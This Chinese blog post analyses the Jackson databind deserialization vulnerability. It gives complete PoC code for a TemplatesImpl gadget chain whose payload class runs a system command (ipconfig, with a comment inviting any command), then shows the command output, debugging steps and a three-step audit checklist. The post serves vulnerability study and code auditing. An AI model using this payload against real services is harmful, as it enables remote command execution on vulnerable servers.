1. JACKSON漏洞解析

poc代码:main.java

import com.fasterxml.jackson.databind.ObjectMapper;

import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;

import org.springframework.util.FileCopyUtils;

import java.io.ByteArrayOutputStream;

import java.io.File;

import java.io.FileInputStream;

import java.io.IOException;

/**

 * Created by Administrator on 2017/6/12.

 */

public class main {

    public static void main(String[] args)  {

        String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

//改成exp存在的绝对路径

        String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");

        String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +

                "{\n" +

                "'transletBytecodes':['"+exp+"'],\n" +

                "'transletName':'p',\n" +

                "'outputProperties':{}\n" +

                "}\n" +

                "]\n" +

                "}");

        System.out.printf(jsonInput);

        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        User user;

        try {

            user = mapper.readValue(jsonInput, User.class);

            System.out.println(user.getSex());

            System.out.println(user.getName());

        } catch (Exception e) {

            e.printStackTrace();

        }

    }

    public static String aposToQuotes(String json){

        return json.replace("'","\"");

    }

    public static String readClassStr(String cls){

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

        try {

            FileCopyUtils.copy(new FileInputStream(new File(cls)),byteArrayOutputStream);

        } catch (IOException e) {

            e.printStackTrace();

        }

        return Base64.encode(byteArrayOutputStream.toByteArray());

   }

}

exp.java



import com.sun.javaws.progress.Progress;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**
 * Created by Administrator on 2017/6/12.
 */
public class exp extends AbstractTranslet {
    public exp() throws Exception {

        try {
            BufferedReader br = null;
            //修改成你想要执行的命令
            Process p = Runtime.getRuntime().exec("ipconfig");
            br = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line = null;
            StringBuilder sb = new StringBuilder();
            while ((line = br.readLine()) != null) {
                sb.append(line + "\n");
                System.out.println(sb);
            }
            File file = new File("result.txt");
            //File file =new File("javaio-appendfile.txt");

            //if file doesnt exists, then create it
            if(!file.exists()){
                file.createNewFile();
            }

            //true = append file
            FileWriter fileWritter = new FileWriter(file.getName(),true);
            BufferedWriter bufferWritter = new BufferedWriter(fileWritter);
            bufferWritter.write(sb.toString());
            bufferWritter.close();
            System.out.println(sb);
        } catch (IOException e) {
            e.printStackTrace();

        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}


 




user.java




import java.io.Serializable;

import java.util.Arrays;

import java.util.InputMismatchException;

import java.util.Objects;

/**

 * Created by Administrator on 2017/6/12.

 */

public class User {

    private Object object;

    public Object getObject() {

        return object;

    }

    public void setObject(Object object) {

        this.object = object;

    }

}




尝试执行:
发现result.txt中存在结果




Windows IP ����

��̫�������� �������� 2:

   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�

   �����ض��� DNS ��׺ . . . . . . . : 

��̫�������� Npcap Loopback Adapter:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18

   �Զ����� IPv4 ��ַ  . . . . . . . : 169.254.69.212

   ��������  . . . . . . . . . . . . : 255.255.0.0

   Ĭ�����. . . . . . . . . . . . . : 

��̫�������� ��������:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12

   IPv4 ��ַ . . . . . . . . . . . . : 10.0.83.198

   ��������  . . . . . . . . . . . . : 255.255.255.0

   Ĭ�����. . . . . . . . . . . . . : 10.0.83.1




调试本地代码:
由于Jackson中是通过readValue执行命令,
按F7进入当前函数:


跳过几次赋值,进入到当前函数,发现次函数中存在反序列化的赋值,按F7进行调试




经过多次调试发现,命令在标红处代码执行,并抛出异常




多部调试,F7进入函数代码(SetterlessProperty.java):




代码执行:




2. Jackson反序列化漏洞如何审计


OK,说到这就简单介绍了下,Jackson的反序列化代码运行的过程,那么现在代码审计中如何审计的出来项目是否包含Jackson反序列化呢?


第一步:看版本,如果Jackson的版本号不在存在漏洞的版本列表中,肯定不会有此漏洞,


版本列表:


Jackson 2.7版本(<2.7.10)


Jackson 2.8版本(<2.8.9)


第二步:你的Bean类中是否包含object类型的变量:


例如,我这边的User类中的Object变量定义为:private Object object


第三步:Jackson的ObjectMapper必须调用enableDefaultTyping:


ObjectMapper mapper = new ObjectMapper();


mapper.enableDefaultTyping();


满足以上三个要求,才能进行构造POC进行校验。
												


											
小白审计JACKSON反序列化漏洞的更多相关文章
	

    
								
  1. php反序列化漏洞复现
		
    超适合小白的php反序列化漏洞复现 写在前头的话 在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下.我觉得学习的时候,所有的问题都应该问3个问题: ...
    
		
    2. 
						
  2. ThinkPHP v6.0.x 反序列化漏洞利用
		
    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...
    
		
    3. 
						
  3. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    4. 
						
  4. Java审计之CMS中的那些反序列化漏洞
		
    Java审计之CMS中的那些反序列化漏洞 0x00 前言 过年这段时间比较无聊,找了一套源码审计了一下,发现几个有意思的点拿出来给分享一下. 0x01 XStream 反序列化漏洞 下载源码下来发现并 ...
    
		
    5. 
						
  5. PHP审计之PHP反序列化漏洞
		
    PHP审计之PHP反序列化漏洞 前言 一直不懂,PHP反序列化感觉上比Java的反序列化难上不少.但归根结底还是serialize和unserialize中的一些问题. 在此不做多的介绍. 魔术方法  ...
    
		
    6. 
						
  6. php代码审计9审计反序列化漏洞
		
    序列化与反序列化:序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根 ...
    
		
    7. 
						
  7. Java反序列化漏洞通用利用分析
		
    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...
    
		
    8. 
						
  8. Java反序列化漏洞分析
		
    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...
    
		
    9. 
						
  9. .NET高级代码审计(第五课) .NET Remoting反序列化漏洞
		
    0x00 前言 最近几天国外安全研究员Soroush Dalili (@irsdl)公布了.NET Remoting应用程序可能存在反序列化安全风险,当服务端使用HTTP信道中的SoapServerF ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. javascript——数据类型
			
    在内存中,分为栈.堆.代码段.静态区,为了快速处理复杂的代码,在不同的区间储存不同的数据类型. 数据类型分为初始类型与引用类型,初始类型在栈中存储,变量赋值传值不传址,引用类型在堆中存储,传址不传值. ...
    
			
    2. 
						
  2. 浅析c++/java/c#三大热门编程语言的运行效率
			
    从安全角度考虑,C#是这几中语言中最为安全的,它其中定义的相关安全机制很好的确保了系统的安全... 今天和同学们一起探讨下c++/java/c# 三大热门语言的运行效率情况,以及各自的用途. 估计有很 ...
    
			
    3. 
						
  3. css 画出三角形
			
    技术分享不一定行文累赘 这里说说最简洁的 css 画出三角形 display: inline-block; border: 10px dashed transparent; border-left:  ...
    
			
    4. 
						
  4. html常用的知识点以及混合框架
			
    html中:   <hr/> 在页面中创建水平线 例如:   <p> p标签是定义段落   > alt 作为可预备可替换信息,在无法加载图片时显示文字信息   定义htm ...
    
			
    5. 
						
  5. bzoj1798 [Ahoi2009]维护序列
			
    Description 老师交给小可可一个维护数列的任务,现在小可可希望你来帮他完成. 有长为N的数列,不妨设为a1,a2,…,aN .有如下三种操作形式: (1)把数列中的一段数全部乘一个值; (2 ...
    
			
    6. 
						
  6. python3.x元组打印错误 TypeError: unsupported operand type(s) for %: 'NoneType' and 'tuple'
			
    原创by南山南北秋悲 欢迎引用!请注明原地址:http://www.cnblogs.com/hwd9654/p/5676746.html  谢谢! TypeError: unsupported ope ...
    
			
    7. 
						
  7. poj2352树状数组
			
    Astronomers often examine star maps where stars are represented by points on a plane and each star h ...
    
			
    8. 
						
  8. mysql for windows(服务器)上的配置安装--实例
			
    mysql for windows(服务器)上的配置安装 **** 下载 官网网址:https://www.mysql.com/downloads/ 选择左上角Community 再选择MySQL C ...
    
			
    9. 
						
  9. java-cef嵌入基于Chrome内核浏览器,做页面爬虫(可以尽在ajax异步请求数据)
			
    1 CentOS 7.0 上安装和配置 VNC 服务器 2.1 2.1.1 首先,我们需要一个可用的桌面环境(X-Window),如果没有的话要先安装一个. 注意:以下命令必须以 root 权限运行. ...
    
			
    10. 
						
  10. ubuntu 使用第一天
			
    1. 在 apt-get install xxx 时候 未选择合适的源 -> 改 sources.list2. 接1 未配好 DNS -> http://dudns.baidu.com/u ...
    
			
    11.